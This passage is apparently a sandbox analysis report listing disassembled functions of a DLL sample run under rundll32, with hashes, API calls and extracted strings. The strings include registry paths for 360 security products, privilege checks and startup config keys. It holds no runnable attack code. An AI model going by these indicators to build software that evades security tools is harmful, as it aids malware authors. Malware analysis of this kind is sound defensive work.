                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$??3@CountEnterLeaveTickmemmove
                                                                  • String ID:
                                                                  • API String ID: 1944083165-0
                                                                  • Opcode ID: e7dc1351d672686ce6982c514aa1efe126a088afe47b95bc729bfb6aef2c92dc
                                                                  • Instruction ID: f41da155b52ef09f3583e4d9bfd8bf17b476c2db053c24b9ffbabfba65fc2eed
                                                                  • Opcode Fuzzy Hash: e7dc1351d672686ce6982c514aa1efe126a088afe47b95bc729bfb6aef2c92dc
                                                                  • Instruction Fuzzy Hash: 37E15932B01F449AEB92CFA1E8403DD33B6F748798F148125EE5967B98DE34C65AD344
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: _swprintf_c_l$ErrorFileLastSizemallocmemset
                                                                  • String ID: INIT
                                                                  • API String ID: 2772675779-4041279936
                                                                  • Opcode ID: 91801e61f8e34b5680577b6ef1157ad949fcf405e34d1d65f93b8e184a0d9fad
                                                                  • Instruction ID: 738f7e56dffb12879fa424a41098a8b7db62e01a67729e30f645ff56db629163
                                                                  • Opcode Fuzzy Hash: 91801e61f8e34b5680577b6ef1157ad949fcf405e34d1d65f93b8e184a0d9fad
                                                                  • Instruction Fuzzy Hash: 31E192727043588BF7A6EB6598507EA77A6F70D7C8F54C029AE5A43B86DF34C608CB10
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: memset$DevicesDisplayEnum
                                                                  • String ID:
                                                                  • API String ID: 2856225746-0
                                                                  • Opcode ID: 5c5709e5d7299c401f45f5ffd4562792fd3562d72889c1e19fc8d239cebed65d
                                                                  • Instruction ID: 90789e0161200a82d414c2e2bf23b1b10d1e56c07e73b18e3e2605f8b4aac2a4
                                                                  • Opcode Fuzzy Hash: 5c5709e5d7299c401f45f5ffd4562792fd3562d72889c1e19fc8d239cebed65d
                                                                  • Instruction Fuzzy Hash: EA918C32A04A8892E7A2CF75C5053ED6761F7987C8F459202EF8D2769ADF75D78AC300
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,00000000,00000000,00000040,?,0000000180013F90), ref: 0000000180010BE9
                                                                  • RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,00000000,00000000,00000040,?,0000000180013F90), ref: 0000000180010C46
                                                                  • memmove.MSVCRT(?,?,?,?,?,?,?,?,00000000,00000000,00000040,?,0000000180013F90), ref: 0000000180010D0F
                                                                  • ??_V@YAXPEAX@Z.MSVCRT ref: 0000000180010D31
                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,00000000,00000000,00000040,?,0000000180013F90), ref: 0000000180010D3B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpenQueryValuememmove
                                                                  • String ID: 360scan
                                                                  • API String ID: 1121107697-2450673717
                                                                  • Opcode ID: 220e67dd3970d468599f7a797be11ec42a8334a823f280886d40bb2abff1120a
                                                                  • Instruction ID: 8412be06b917c2556790a81d519247f335b1f81f587c3bd72331bc97ccab05af
                                                                  • Opcode Fuzzy Hash: 220e67dd3970d468599f7a797be11ec42a8334a823f280886d40bb2abff1120a
                                                                  • Instruction Fuzzy Hash: B551F336700A4889FBA6CBB5E8107ED3760BB487E8F548215EEA917B95DF74C649C700
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionThrow$??3@
                                                                  • String ID:
                                                                  • API String ID: 3542664073-0
                                                                  • Opcode ID: 4077b6000bdbe81cdcb22badff92ad6060c6f4ec82431c923b1cffb770fd83d1
                                                                  • Instruction ID: f77bb453ddad34bb426a0367fc3509630a9405fc871705a0e6efaa82900c553f
                                                                  • Opcode Fuzzy Hash: 4077b6000bdbe81cdcb22badff92ad6060c6f4ec82431c923b1cffb770fd83d1
                                                                  • Instruction Fuzzy Hash: 35216A72B00A88C9E75DFE33B8423EB6212ABD87C0F18D435BA594B69BDE25C5168740
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0000000180066CBF
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: DebugDebuggerErrorLastOutputPresentStringmemset
                                                                  • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                  • API String ID: 1848478996-631824599
                                                                  • Opcode ID: 9f3b69b346ce0167d1f9eabdb45a87455ea8902d3636c2fa194e63da2080b7c6
                                                                  • Instruction ID: 5420fd47393a03a9017ccb442b178d5ad27f9d1acba3036b184651f5d30fce96
                                                                  • Opcode Fuzzy Hash: 9f3b69b346ce0167d1f9eabdb45a87455ea8902d3636c2fa194e63da2080b7c6
                                                                  • Instruction Fuzzy Hash: FC117032710B4997F7869B22EE453E932A1FB58395F50C125E75982AA0EF3CD67CC710
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionThrow
                                                                  • String ID:
                                                                  • API String ID: 432778473-0
                                                                  • Opcode ID: 51705d7ffc1c5a9faf17d18654f459016f05baa871bea5d42b40ed88e15a0c9d
                                                                  • Instruction ID: 0cc55a271704fcaf4879220f63c9cc24c35a4ef39e1216f676686ee34d186413
                                                                  • Opcode Fuzzy Hash: 51705d7ffc1c5a9faf17d18654f459016f05baa871bea5d42b40ed88e15a0c9d
                                                                  • Instruction Fuzzy Hash: CE118471714A88C9E75EFE33A8027EB5312ABDC7C0F14D434B9894B65BCF25C6164300
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: memmovememset
                                                                  • String ID:
                                                                  • API String ID: 1288253900-0
                                                                  • Opcode ID: 25317eca67bb0a3083e8d95f7975eeecdd6a0a887f58df33bf998c20beef77dc
                                                                  • Instruction ID: 53b279b989bf8eb66429a88fea8492b1387e1814281b1786c9cbc4725fb6e079
                                                                  • Opcode Fuzzy Hash: 25317eca67bb0a3083e8d95f7975eeecdd6a0a887f58df33bf998c20beef77dc
                                                                  • Instruction Fuzzy Hash: 56A1A273A146D48FD795CF79D8407AC7BE1F389788F548126EA9997B48EB38C205CB00
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: ControlDevice
                                                                  • String ID:
                                                                  • API String ID: 2352790924-0
                                                                  • Opcode ID: a66e1d163aca22c0d64387c7a093102cf96f82ef91a8c2df69456084ab1fc6cd
                                                                  • Instruction ID: 1e54cb40d621f6ee58c2f67f74a10768d1db0efbd2ae079103c51a30650bf8b3
                                                                  • Opcode Fuzzy Hash: a66e1d163aca22c0d64387c7a093102cf96f82ef91a8c2df69456084ab1fc6cd
                                                                  • Instruction Fuzzy Hash: 68D04276928B84CBD6A09B18F48430AB7A0F388794F501215EBCD46B29DB3CC2558F04
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc
                                                                  • String ID: sqlite3_bind_blob$sqlite3_bind_int$sqlite3_bind_int64$sqlite3_bind_parameter_index$sqlite3_bind_text16$sqlite3_close$sqlite3_column_blob$sqlite3_column_bytes$sqlite3_column_int$sqlite3_column_int64$sqlite3_column_text16$sqlite3_exec$sqlite3_finalize$sqlite3_open16$sqlite3_prepare16_v2$sqlite3_reset$sqlite3_step
                                                                  • API String ID: 190572456-2634604785
                                                                  • Opcode ID: c6900063e6f1f58e840ab128dafbd2c95afe69325bb9c3ee8f7ad832e163feb1
                                                                  • Instruction ID: 5824c6e44f34b1b970dc4f09c8d16c86c5da5fb83a6df47551891ccc5cd06f94
                                                                  • Opcode Fuzzy Hash: c6900063e6f1f58e840ab128dafbd2c95afe69325bb9c3ee8f7ad832e163feb1
                                                                  • Instruction Fuzzy Hash: D351A271201F4EA5EF968BA4E8913D833A1FB4CBD7F19D125A92D46364EF38C698C710
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$Clear$Init
                                                                  • String ID: //root/config/item$install_first_open$name$pop_count$propoganda$tray_startup$update_first_open$value
                                                                  • API String ID: 3740757921-2166998829
                                                                  • Opcode ID: da0fe18e004557cc7b0f2f3d8356101b6c2bfabc220260c257d30514f78ba6f4
                                                                  • Instruction ID: aff580d4b75deea64deb7e46e4065f56afbdc634fa72071d76af76b76e89fc57
                                                                  • Opcode Fuzzy Hash: da0fe18e004557cc7b0f2f3d8356101b6c2bfabc220260c257d30514f78ba6f4
                                                                  • Instruction Fuzzy Hash: CDB12A72705A09DAFB95CF65D8903EC27B0FB49B99F149421FA0EA3A64DF35CA48C340
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$CriticalSectionmemset$AppendPath$??3@CountEnterErrorFileFreeInitializeLastLeaveLibraryModuleNameSpin
                                                                  • String ID: ..\deepscan\$360Safe$360util$QueryFileCancel$QueryFileClose$QueryFileCreate$QueryFilesEx2$QuerySetOption$cloudcom2.dll
                                                                  • API String ID: 1015768321-2684063875
                                                                  • Opcode ID: 75acf276f5303c209b0e6b56f5e71fa6dc54d5f9daca34d9052b038fe3a01ebd
                                                                  • Instruction ID: 85df055bf9425c6c0da70963d94a526d831783e1f19dc8973dcfbc1a34099653
                                                                  • Opcode Fuzzy Hash: 75acf276f5303c209b0e6b56f5e71fa6dc54d5f9daca34d9052b038fe3a01ebd
                                                                  • Instruction Fuzzy Hash: B2818032301B8896EBA6DF21ED403D933A5FB497D4F548125EA5A0BBA4DF38D768C740
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Close$FreeLibraryOpenPathQueryValuememset$AddressAppendExistsFileHandleModuleProc
                                                                  • String ID: Init$Path$SOFTWARE\360Safe\360Ent$SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe$ServiceCall$\entclient\EntSvcCall_x64.dll
                                                                  • API String ID: 1498439332-702965266
                                                                  • Opcode ID: 7287dc7089829755e66462901955348d5673694c8cc533bc2c05e2a633cd80c9
                                                                  • Instruction ID: 4281fb2f7f8363f35efb0fd70a638a071d20137889dcc292f685ea46b841f4e2
                                                                  • Opcode Fuzzy Hash: 7287dc7089829755e66462901955348d5673694c8cc533bc2c05e2a633cd80c9
                                                                  • Instruction Fuzzy Hash: 74513E32614B4996EF918F20E8557DA73A0F7897C4F549116BA9F06A79EF38C74CCB00
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: wcsstr$ExtensionFindPath_wcsicmp_wtoiwcschr
                                                                  • String ID: CLSID$InprocHandler$InprocHandler32$InprocServer$InprocServer32$LocalServer$LocalServer32$Server$ShellExecute$\\?\$gfffffff$gfffffff
                                                                  • API String ID: 3861457700-2318594275
                                                                  • Opcode ID: 1a717cbbda8cc80c3c9297c878bbbc669d8a73a80a9fe28ac877bfe538569426
                                                                  • Instruction ID: f5eaf3cd70d8a4233fc3eb4f5baabc932733307175318797ea3a634ab2d80fd0
                                                                  • Opcode Fuzzy Hash: 1a717cbbda8cc80c3c9297c878bbbc669d8a73a80a9fe28ac877bfe538569426
                                                                  • Instruction Fuzzy Hash: 3A12B672301A4886EB92DF39C8407DD23A1FB85BE5F44D211EA6D576E9EF78CA48C704
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: CountTick$Sleep
                                                                  • String ID: ..\$..\cloudcom264.dll$..\deepscan\cloudcom264.dll$CreateObject
                                                                  • API String ID: 4250438611-3269604003
                                                                  • Opcode ID: b26729f86dd87614dde1f224353b88e55a5d4336fc5642cbf555589fae585a1a
                                                                  • Instruction ID: 779814ae67fce754565a54a050c1806dc9f81f57e114568d0bd2b2f20499cc86
                                                                  • Opcode Fuzzy Hash: b26729f86dd87614dde1f224353b88e55a5d4336fc5642cbf555589fae585a1a
                                                                  • Instruction Fuzzy Hash: 0CC16D72301F4882EB969B29D84479D33B1F788BE4F458215FA2E437A5EF38CA49C740
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: memset$_wcsicmp$AppendCriticalPathSectionValue$EnterFileLeaveModuleName
                                                                  • String ID: 360ExtHost$PCInfo$Partner$SOFTWARE\Wow6432Node\360EDRSensor$SOFTWARE\Wow6432Node\360EntSecurity$SOFTWARE\Wow6432Node\360SD$SOFTWARE\Wow6432Node\360Safe\Coop$ipartner$pid
                                                                  • API String ID: 3226263223-3142758636
                                                                  • Opcode ID: 628566989c82da212381fb3148179b37bd681cc2eaf5be604a1b5c7982e4b541
                                                                  • Instruction ID: 9533c192c26b347b8b9675f8c4be5ba0e6f9fe9a3a5b632a6bc0f6ba07ebb3e1
                                                                  • Opcode Fuzzy Hash: 628566989c82da212381fb3148179b37bd681cc2eaf5be604a1b5c7982e4b541
                                                                  • Instruction Fuzzy Hash: CF419D31A00A0C94FB96DB22A8403D963A4F74DBE4F909225FD28677A5EF39C74EC340
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Count_cwprintf_s_lmemset$??3@Tickmemmove$??2@CriticalErrorHeapInitializeLastProcessSectionSpinrandsrand
                                                                  • String ID: 0=%s$360safe$DomainQuery$[%s]$com$mid=%sm2=%sproduct=%scombo=%srule_group_id=%suv=%s$router$router:1
                                                                  • API String ID: 1789426470-3446598425
                                                                  • Opcode ID: 61786b1980ef7039dc4211af90e47e9a0e74f34993d56612bf85e9d061f4368c
                                                                  • Instruction ID: 6d6f9855de1d8c5247af129e1c82467daf937bd8777ee679c9f2b2c93b700a4d
                                                                  • Opcode Fuzzy Hash: 61786b1980ef7039dc4211af90e47e9a0e74f34993d56612bf85e9d061f4368c
                                                                  • Instruction Fuzzy Hash: D8D19132204F4882EB419B69D8803DE73A0F789BE5F108226BAAD477E5DF78C649C704
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: wcscmp$Token$GlobalInformationProcess$AccountAllocCloseCurrentErrorFreeHandleLastLookupOpen
                                                                  • String ID: LOCAL SERVICE$NETWORK SERVICE$NT AUTHORITY$SYSTEM
                                                                  • API String ID: 3141378966-199577007
                                                                  • Opcode ID: 8d6976f719ecb46038f7faa6d62441ad30095ab4bbf55d005c38fee77e3359ad
                                                                  • Instruction ID: cee3605f7c7adaec53412b2e982fb153fefebb873c81ca2b5be3308eddbb09f0
                                                                  • Opcode Fuzzy Hash: 8d6976f719ecb46038f7faa6d62441ad30095ab4bbf55d005c38fee77e3359ad
                                                                  • Instruction Fuzzy Hash: F2517C32604B4986EBE28F14E8847DA73A5F78D7D8F518125EA5D436A4DF39C70DCB00
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
